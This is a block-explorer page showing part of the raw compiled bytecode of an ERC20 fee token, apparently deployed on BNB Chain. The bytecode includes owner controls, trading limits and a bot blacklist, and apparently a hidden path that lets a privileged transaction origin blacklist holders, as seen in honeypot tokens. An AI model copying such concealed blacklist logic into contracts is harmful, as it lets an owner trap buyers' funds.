05760405162461bcd60e51b815260206004820152601c60248201527f43616e2774207769746864726177206e617469766520746f6b656e73000000006044820152606401610759565b6040516370a0823160e01b81523060048201525f906001600160a01b038516906370a0823190602401602060405180830381865afa158015610a34573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a589190611f25565b60405163a9059cbb60e01b81526001600160a01b038581166004830152602482018390529192509085169063a9059cbb906044016020604051808303815f875af1158015610aa8573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610acc9190611f3c565b604080516001600160a01b0387168152602081018490529193507fdeda980967fcead7b61e78ac46a4da14274af29e894d4d61e8b81ec38ab3e438910160405180910390a15092915050565b60606004805461079b90611eaf565b5f61082833846108f48560405180606001604052806025815260200161218c60259139335f9081526001602090815260408083206001600160a01b038d1684529091529020549190611703565b5f610828338484610df5565b6006546001600160a01b03163314610baa5760405162461bcd60e51b815260040161075990611e7a565b6001600160a01b038116610c0f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610759565b6006546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a3600680546001600160a01b0319166001600160a01b0392909216919091179055565b610c95307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84610d48565b60405163f305d71960e01b8152306004820152602481018390525f60448201819052606482015261dead60848201524260a48201527f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b03169063f305d71990839060c40160606040518083038185885af1158015610d1c573d5f5f3e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610d419190611f5b565b5050505050565b6001600160a01b038316610d6e5760405162461bcd60e51b815260040161075990611f86565b6001600160a01b038216610d945760405162461bcd60e51b815260040161075990611fca565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610e1b5760405162461bcd60e51b81526004016107599061200c565b6001600160a01b038216610e415760405162461bcd60e51b815260040161075990612051565b805f03610e5857610e5383835f61173b565b505050565b6001600160a01b0383165f9081526007602052604090205460ff1615610eb55760405162461bcd60e51b8152602060048201526012602482015271109bdd081a5cc81b9bdd08185b1b1bddd95960721b6044820152606401610759565b325f908152601c602052604090205460ff168015610f0557507f0000000000000000000000002a0d96ffccde2c64dabf4997cb641e5f352869bb6001600160a01b0316836001600160a01b031614155b8015610f1b57506001600160a01b03821661dead145b8015610f5457506402540be40081610f47856001600160a01b03165f9081526020819052604090205490565b610f519190611f12565b11155b15610f88576001600160a01b0383165f908152600760205260408120805460ff19166001179055610e53908490849061173b565b6006546001600160a01b03848116911614801590610fb457506006546001600160a01b03838116911614155b8015610fc857506001600160a01b03821615155b8015610fdf57506001600160a01b03821661dead14155b8015610fee575060085460ff16155b156112de57600c5460ff1661107f576001600160a01b0383165f908152601c602052604090205460ff168061103a57506001600160a01b0382165f908152601c602052604090205460ff165b61107f5760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b6044820152606401610759565b6001600160a01b0383165f908152601e602052604090205460ff1680156110be57506001600160a01b0382165f908152601d602052604090205460ff16155b156111a1576009548111156111335760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b6064820152608401610759565b600b546001600160a01b0383165f908152602081905260409020546111589083612094565b111561119c5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b6044820152606401610759565b6112de565b6001600160a01b0382165f908152601e602052604090205460ff1680156111e057506001600160a01b0383165f908152601d602052604090205460ff16155b156112565760095481111561119c5760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b6064820152608401610759565b6001600160a01b0382165f908152601d602052604090205460ff166112de57600b546001600160a01b0383165f9081526020819052604090205461129a9083612094565b11156112de5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b6044820152606401610759565b305f90815260208190526040812054600a54909190821080159190829061130c5750600c54610100900460ff165b801561131b575060085460ff16155b801561133f57506001600160a01b0386165f908152601e602052604090205460ff16155b801561136357506001600160a01b0386165f908152601c602052604090205460ff16155b801561138757506001600160a01b0385165f908152601c602052604090205460ff16155b156113ac576008805460ff191660011790556113a1611864565b6008805460ff191690555b6008546001600160a01b0387165f908152601c602052604090205460ff918216159116806113f157506001600160a01b0386165f908152601c602052604090205460ff165b156113f957505f5b5f81156115d9576001600160a01b0387165f908152601e602052604090205460ff16801561142857505f601454115b156114d95761144d606461144760145489611a0090919063ffffffff16565b90611a7e565b9050601454601654826114609190611efb565b61146a91906120a7565b60195f82825461147a9190612094565b909155505060145460155461148f9083611efb565b61149991906120a7565b60185f8282546114a99190612094565b90915550506014546017546114be9083611efb565b6114c891906120a7565b6114d29084612094565b92506115a8565b6001600160a01b0388165f908152601e602052604090205460ff16801561150157505f601054115b156115a857611520606461144760105489611a0090919063ffffffff16565b9050601054601254826115339190611efb565b61153d91906120a7565b60195f82825461154d9190612094565b90915550506010546011546115629083611efb565b61156c91906120a7565b60185f82825461157c9190612094565b90915550506010546013546115919083611efb565b61159b91906120a7565b6115a59084612094565b92505b80156115b9576115b988308361173b565b82156115cc576115cc3061dead8561173b565b6115d68187611f12565b95505b6115e488888861173b565b5050505050505050565b5f6001600160a01b0385166116155760405162461bcd60e51b815260040161075990611f86565b6001600160a01b03841661163b5760405162461bcd60e51b815260040161075990611fca565b6001600160a01b038581165f8181526001602090815260408083209489168084529482529182902087905590518681527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3949350505050565b5f806116aa8385612094565b9050838110156116fc5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610759565b9392505050565b5f81848411156117265760405162461bcd60e51b81526004016107599190611d74565b505f6117328486611f12565b95945050505050565b611746838383611abf565b6001600160a01b03831661176c5760405162461bcd60e51b81526004016107599061200c565b6001600160a01b0382166117925760405162461bcd60e51b815260040161075990612051565b6117ce81604051806060016040528060268152602001612166602691396001600160a01b0386165f908152602081905260409020549190611703565b6001600160a01b038085165f9081526020819052604080822093909355908416815220546117fc908261169e565b6001600160a01b0383165f8181526020819052604090209190915561dead14610e5357816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610de891815260200190565b305f9081526020819052604081205490505f6018546019546118869190612094565b90505f821580611894575081155b1561189e57505050565b600a546118ac906014611efb565b8311156118c457600a546118c1906014611efb565b92505b5f600283601954866118d69190611efb565b6118e091906120a7565b6118ea91906120a7565b90505f6118f78583611b36565b90504761190382611b77565b5f61190e4783611b36565b90505f61192a8761144760185485611a0090919063ffffffff16565b90505f6119378284611f12565b5f60198190556018559050851580159061195057505f81115b156119a35761195f8682610c6a565b601954604080518781526020810184905280820192909252517f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5619181900360600190a15b601a546040516001600160a01b039091169047905f81818185875af1925050503d805f81146119ed576040519150601f19603f3d011682016040523d82523d5f602084013e6119f2565b606091505b505050505050505050505050565b5f825f03611a0f57505f61082c565b5f611a1a8385611efb565b905082611a2785836120a7565b146116fc5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610759565b5f6116fc83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250611d2d565b6001600160a01b038316611ae55760405162461bcd60e51b81526004016107599061200c565b6001600160a01b038216611b0b5760405162461bcd60e51b815260040161075990612051565b325f908152601c6020526040902054610e53908490849060ff16611b2f575f611d59565b5f19611d59565b5f6116fc83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611703565b6040805160028082526060820183525f9260208301908036833701905050905030815f81518110611baa57611baa6120c6565b60200260200101906001600160a01b031690816001600160a01b0316815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611c26573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611c4a91906120da565b81600181518110611c5d57611c5d6120c6565b60200260200101906001600160a01b031690816001600160a01b031681525050611ca8307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84610d48565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169063791ac94790611cfc9085905f908690309042906004016120f5565b5f604051808303815f87803b158015611d13575f5ffd5b505af1158015611d25573d5f5f3e3d5ffd5b505050505050565b5f8183611d4d5760405162461bcd60e51b81526004016107599190611d74565b505f61173284866120a7565b5f8111611d67576001611d69565b5f5b60ff16600555505050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b6001600160a01b0381168114611dbd575f5ffd5b50565b5f5f60408385031215611dd1575f5ffd5b8235611ddc81611da9565b946020939093013593505050565b5f60208284031215611dfa575f5ffd5b81356116fc81611da9565b5f5f5f60608486031215611e17575f5ffd5b8335611e2281611da9565b92506020840135611e3281611da9565b929592945050506040919091013590565b5f5f60408385031215611e54575f5ffd5b8235611e5f81611da9565b91506020830135611e6f81611da9565b809150509250929050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b600181811c90821680611ec357607f821691505b602082108103611ee157634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b808202811582820484141761082c5761082c611ee7565b8181038181111561082c5761082c611ee7565b5f60208284031215611f35575f5ffd5b5051919050565b5f60208284031215611f4c575f5ffd5b815180151581146116fc575f5ffd5b5f5f5f60608486031215611f6d575f5ffd5b5050815160208301516040909301519094929350919050565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b8082018082111561082c5761082c611ee7565b5f826120c157634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f602082840312156120ea575f5ffd5b81516116fc81611da9565b5f60a0820187835286602084015260a0604084015280865180835260c0850191506020880192505f5b818110156121455783516001600160a01b031683526020938401939092019160010161211e565b50506001600160a01b03959095166060840152505060800152939250505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122098cb03d3638c268cc1d157315d266ed7e52cacff807f6c5599832b4c1aa44b9a64736f6c634300081e0033
Loading...
Loading
Loading...
Loading
Net Worth in USD
$0.00
Net Worth in ETH
0
Token Allocations
BNB
100.00%
Multichain Portfolio | 33 Chains
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.